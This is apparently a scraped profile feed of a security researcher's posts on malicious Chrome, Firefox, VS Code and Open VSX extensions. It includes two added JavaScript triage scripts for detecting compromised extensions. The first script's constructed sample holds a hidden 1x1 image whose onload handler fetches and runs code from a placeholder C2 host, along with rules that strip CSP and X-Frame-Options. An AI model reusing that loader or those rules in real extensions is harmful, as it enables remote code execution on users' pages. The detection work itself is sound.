We tracked this one from the moment it was listed for sale Oct 11th, through the ownership change, to the malicious update Feb 17th. Full technical breakdown of the pixel trick, the C2 infrastructure, and the CSP stripping.
annex.security/blog/pixel-p...
Posts by tuckner
The original extension still works perfectly. Google Lens integration, screen capture, all of it. Users would never notice anything beyond a single permission acceptance prompt. That's what makes extension supply chain attacks so dangerous.
The new owner added a C2 server, stripped important security headers from all pages, and used a 1x1 invisible pixel's onload handler to execute remote JavaScript in pages. The actual malicious code never appears in the extension's source files, but the code update was worrying.
A Chrome extension with 7,000 users and a Google Featured badge was recently sold, weaponized, and pushed a malicious update that executed code through a hidden pixel. Here's how it worked 👇
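The thread above describes two indicators in the malicious update: declarativeNetRequest rules that strip security response headers from every page, and an invisible 1x1 image whose onload handler runs remotely fetched JavaScript. The script below is an added example for triaging an unpacked extension for exactly those two indicators; it is not the compromised extension's code and not Secure Annex's tooling. The manifest, rules file, content script and hostnames are all constructed for the example, and the regexes are a heuristic, not a claim about how this particular extension was written.

```javascript
// Added example: static triage of an unpacked Chrome extension for
// (1) DNR rules that remove security headers and (2) an <img> whose load
// handler leads to remote code execution. Inputs are constructed samples.

const SECURITY_HEADERS = new Set([
  "content-security-policy",
  "content-security-policy-report-only",
  "x-frame-options",
  "x-content-type-options",
  "strict-transport-security",
]);

// Indicator 1: static declarativeNetRequest rules that strip security headers.
// One entry per (rule, header) so the scope (urlFilter) is visible to the analyst.
function findHeaderStrippingRules(rules) {
  const hits = [];
  for (const rule of rules) {
    const action = rule.action || {};
    if (action.type !== "modifyHeaders") continue;
    for (const h of action.responseHeaders || []) {
      const name = String(h.header || "").toLowerCase();
      if (h.operation === "remove" && SECURITY_HEADERS.has(name)) {
        const cond = rule.condition || {};
        hits.push({ ruleId: rule.id, header: name, urlFilter: cond.urlFilter || cond.regexFilter || "*" });
      }
    }
  }
  return hits;
}

// Indicator 2: the pixel trick. Only the combination (image + load handler +
// a code-execution sink) is flagged, so a plain tracking pixel does not fire.
const IMG_RE = /createElement\(\s*["']img["']\s*\)|new\s+Image\s*\(/;
const LOAD_RE = /\.onload\s*=|addEventListener\(\s*["']load["']/;
const EXEC_RE = /\beval\s*\(|\bFunction\s*\(|createElement\(\s*["']script["']\s*\)/;
const HIDDEN_RE = /\b(width|height)\s*=\s*["']?1(?:px)?["']?|display\s*:\s*none|visibility\s*:\s*hidden/;
const URL_RE = /https?:\/\/[A-Za-z0-9.-]+(?:\/[^\s"'`)]*)?/g;

function findRemotePixelLoader(source) {
  const r = {
    createsImage: IMG_RE.test(source),
    loadHandler: LOAD_RE.test(source),
    remoteExec: EXEC_RE.test(source),
    hidden: HIDDEN_RE.test(source),
    urls: [...new Set(source.match(URL_RE) || [])],
  };
  r.suspicious = r.createsImage && r.loadHandler && r.remoteExec;
  return r;
}

// Combine both indicators with the manifest's reach: stripping headers "on all
// pages" only matters if the extension can actually touch all pages.
function triage(manifest, rules, contentScript) {
  const perms = [...(manifest.host_permissions || []), ...(manifest.permissions || [])];
  const allUrls = perms.some((p) => p === "<all_urls>" || p === "*://*/*");
  const stripped = findHeaderStrippingRules(rules);
  const pixel = findRemotePixelLoader(contentScript);
  const reasons = [];
  if (stripped.length) {
    const headers = [...new Set(stripped.map((s) => s.header))].join(", ");
    reasons.push(`strips ${headers} (filters: ${stripped.map((s) => s.urlFilter).join(", ")})`);
  }
  if (pixel.suspicious) reasons.push(`image onload -> remote code (${pixel.urls.join(", ") || "no literal URL"})`);
  if (reasons.length && allUrls) reasons.push("scope: <all_urls>");
  return { verdict: reasons.length ? "suspicious" : "clean", reasons, stripped, pixel };
}

// Constructed sample inputs (placeholders, not the real extension or its C2).
const SAMPLE_MANIFEST = { manifest_version: 3, host_permissions: ["<all_urls>"], permissions: ["declarativeNetRequest", "storage"] };
const SAMPLE_RULES = [{
  id: 1, priority: 1,
  action: { type: "modifyHeaders", responseHeaders: [
    { header: "Content-Security-Policy", operation: "remove" },
    { header: "X-Frame-Options", operation: "remove" },
  ] },
  condition: { urlFilter: "*", resourceTypes: ["main_frame", "sub_frame"] },
}];
const SAMPLE_CONTENT_SCRIPT = `
  const px = document.createElement("img");
  px.width = 1; px.height = 1; px.style.display = "none";
  px.onload = async () => {
    const code = await (await fetch("https://c2.example.invalid/payload.js")).text();
    new Function(code)();
  };
  px.src = "https://c2.example.invalid/pixel.gif";
  document.body.appendChild(px);`;
const BENIGN_CONTENT_SCRIPT = `
  const img = document.createElement("img");
  img.src = "https://analytics.example.invalid/p.gif?u=" + location.host;
  img.onload = () => console.log("beacon sent");`;

const REPORT = triage(SAMPLE_MANIFEST, SAMPLE_RULES, SAMPLE_CONTENT_SCRIPT);
console.log(JSON.stringify(REPORT, null, 2));
```

Run it with node against the constructed inputs and the verdict is "suspicious" with three reasons; swap in the benign beacon script and an empty rules list and it reports "clean". In a real review the same functions would be pointed at the unpacked CRX's manifest.json, its static rule files and every script in content_scripts, and the extracted URLs are what you would then pivot on.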
LimaCharlie released their Agentic SecOps Workspace recently which runs Claude Code in their UI including MCP servers. It's never been so easy to just say 'look at my detections and research the extensions'. Even though 1Password falls under an unapproved policy, at least it isn't malicious!
What a mess, and this isn't the first time this has happened!
oorzc.mind-map@1.0.61
oorzc.i18n-tools-plus@1.6.8
oorzc.ssh-tools@0.5.1 (removed)
oorzc.scss-to-css-compile@1.3.4
It is these incremental compromises that will become a widespread incident.
1. Your extension will auto update
2. The malicious versions will be removed from Open VSX so no trace
3. Your extension will not downgrade itself
4. Victims will have to wait until the real developer publishes a new version to update
5. If the extensions are removed, they won't uninstall
As predicted - "oorzc" a developer with extensions totalling 25,000 legitimate installs across 4 extensions looks to have had their Open VSX account compromised and published malicious updates. The worst part is this...
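The five points in the thread above (auto-update, removal from Open VSX, no self-downgrade, waiting on the real developer, no uninstall on removal) mean an admin has to reconcile what is actually installed against the flagged versions by hand. The script below is an added example of that reconciliation; it is not Secure Annex's code and not the oorzc extensions' code. It assumes the `publisher.name@version` line format that `code --list-extensions --show-versions` prints (Cursor's CLI is assumed to accept the same flags), and the installed list is constructed for the example.

```javascript
// Added example: reconcile installed VS Code / Cursor extensions against a
// list of flagged extension@version entries. Exact matches are malicious;
// other versions of the same extension are reported with the post's caveat
// that marketplace removal neither uninstalls nor downgrades the extension.

// The four releases named in the post, in the same id@version form.
const FLAGGED = [
  "oorzc.mind-map@1.0.61",
  "oorzc.i18n-tools-plus@1.6.8",
  "oorzc.ssh-tools@0.5.1 (removed)",
  "oorzc.scss-to-css-compile@1.3.4",
];

// Constructed sample of `code --list-extensions --show-versions` output.
const INSTALLED_OUTPUT = `ms-python.python@2024.22.2
oorzc.mind-map@1.0.61
oorzc.i18n-tools-plus@1.6.7
oorzc.scss-to-css-compile@1.3.5
esbenp.prettier-vscode@11.0.0`;

// "publisher.name@version", tolerating a trailing note such as "(removed)".
function parseExtensionLine(line) {
  const m = /^([^@\s]+)@(\S+)/.exec(line.trim());
  return m ? { id: m[1].toLowerCase(), version: m[2] } : null;
}

// Numeric dotted-version comparison: returns -1, 0 or 1.
function compareVersions(a, b) {
  const pa = a.split(".").map(Number);
  const pb = b.split(".").map(Number);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d < 0 ? -1 : 1;
  }
  return 0;
}

function checkInstalled(listOutput, flagged) {
  // Group flagged versions by extension id so one id can carry several builds.
  const byId = new Map();
  for (const entry of flagged) {
    const e = parseExtensionLine(entry);
    if (!e) continue;
    if (!byId.has(e.id)) byId.set(e.id, []);
    byId.get(e.id).push(e.version);
  }
  const findings = [];
  for (const line of listOutput.split("\n")) {
    const ext = parseExtensionLine(line);
    if (!ext || !byId.has(ext.id)) continue;
    const badVersions = byId.get(ext.id);
    let status, action;
    if (badVersions.includes(ext.version)) {
      status = "malicious";
      action = `code --uninstall-extension ${ext.id}`;
    } else if (badVersions.every((v) => compareVersions(ext.version, v) < 0)) {
      status = "older_than_flagged";
      action = "pin the version or uninstall until the real developer publishes a clean release";
    } else {
      status = "newer_than_flagged";
      action = "confirm this release is the real developer's; the extension will not downgrade itself";
    }
    findings.push({ ...ext, flaggedVersions: badVersions, status, action });
  }
  return findings;
}

const REPORT = checkInstalled(INSTALLED_OUTPUT, FLAGGED);
console.log(JSON.stringify(REPORT, null, 2));
```

Against the constructed list this reports mind-map as malicious, i18n-tools-plus as older than the flagged build and scss-to-css-compile as newer than it; the unrelated extensions produce no finding. Feeding it real `--list-extensions --show-versions` output from each developer machine is the part that has to be done per host, because nothing in the marketplace will do it for you.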
The next supply chain worm has been seeded in Open VSX. A cloned Angular extension with 5000 downloads has been available for two weeks and was updated with malware 6 days ago. This multi-stage attack uses etherhiding, gcal c2, rust implants, and more.
annex.security/blog/worms-l...
Obsidian Security identifies a set of 25 extensions impersonating popular AI providers affecting over 500,000 real users by stealing API keys, prompt poaching, and capturing search queries. It's the wild west in the extension store!
www.obsidiansecurity.com/blog/small-t...
If you've had to listen to me over the last couple months, it's likely you would've heard me say that all of our most important apps will have extensions or plugins for integration. Think we're learning from past mistakes?
A browser extension, PasteReady, that was listed for sale last May became malicious after an ownership transfer on December 27th. Many organizations have been impacted by extensions which changed hands. @secureannex.com watches for transfers and warns you in advance!
www.linkedin.com/pulse/paster...
Pyrefly - Python Language Tooling by Meta is the 4th most used extension in Open VSX. Be careful downloading the 'Pro' version in Cursor hoping you'll get some extra features, it is published by 'casendsabotnu954' who just joined GitHub the other day. Textbook cloning and staging behavior!
Loving a new detection that identifies code extensions published by new and lightly used GitHub accounts. This time it instantly caught an extension impersonating JFrog which already has over 10k downloads.
Not the "pulling a Rabbit out of a hat" magic trick that most want. This Firefox extension completely changes from a "Simple Label Editor" to a Rabby wallet stealer overnight.
A browser extension with over a million users is poaching the prompts of leading AI chat tools.
SimilarWeb loads obfuscated remote configuration to collect the prompts, responses and metadata of your conversations. Your private thoughts are analytics companies' gain.
secureannex.com/blog/prompt-...
These code comments are an improvement from:
1. Request malware
2. Download malware
3. Make malware executable
4. Run malware
This is the extent of the extension available in the VS Marketplace. Installs a Mythic agent from the C2.
Monitoring a large influx of AI slop extensions that are reposting a marginally refactored but known malicious package. The marketplace listings are packed with emojis and a couple sections of 'features'. This one made the mistake of linking to an already known piece of malware.
Welcome to Antigravity the newest most advanced agentic AI development tool by Google...
... uses Open VSX for extensions and shows malicious listings to users.
Changing how an extension looks in a marketplace doesn't require new code to be pushed. Check out the magic when this "Test Extension" magically turns into a "solidity" extension after being published. Review the full lineage of a marketplace listing using the new date picker in Secure Annex.
Vibe coded malicious extensions are getting out of hand!
This 'theme' downloads a malicious zip, unpacks it, and runs it silently with PowerShell.
16 Firefox extensions with almost the same name, same permhash, requesting the most sensitive permission combinations like <all_urls> and cookies. Something being staged?
Glassworm returned in a big way during the holiday. We're tracking 23 code extensions across the VS Marketplace and Open VSX which copy popular extensions, evade filters, manipulate their download counts, and then update with sinister malware.
secureannex.com/blog/glasswo...
Resembles Glassworm signatures loading a rust binary. Some of the activation code is tucked into copied extensions, but still runs on activate.
Malware in Open VSX and available in Cursor right now
tailwind-nuxt.tailwindcss-for-react
flutcode.flutter-extension
yamlcode.yaml-vscode-extension
vims-vsce.vscode-vim
solblanco.svetle-vsce
Open VSX:
saoudrizvsce.claude-dev
saoudrizvsce.claude-devsce
vitalik.solidity
3/3
prisma-inc.prisma-studio-assistance
prettier-vsc.vsce-prettier
flutcode.flutter-extension
csvmech.csvrainbow
codevsce.codelddb-vscode
saoudrizvsce.claude-devsce
clangdcode.clangd-vsce
cweijamysq.sync-settings-vscode
bphpburnsus.iconesvscode
klustfix.kluster-code-verify
2/3
Unprecedented code extension attacks this week. All are name squatting on popular tools. Only a couple have had malware deployed, many are still staging, few have been removed from marketplaces. There may be more coming.
VS Marketplace:
iconkieftwo.icon-theme-materiall
1/3
Imagine how useful it would be if the Chrome Web Store showed you users over time. This ad blocker went from 0 to 40,000 users overnight! 🤔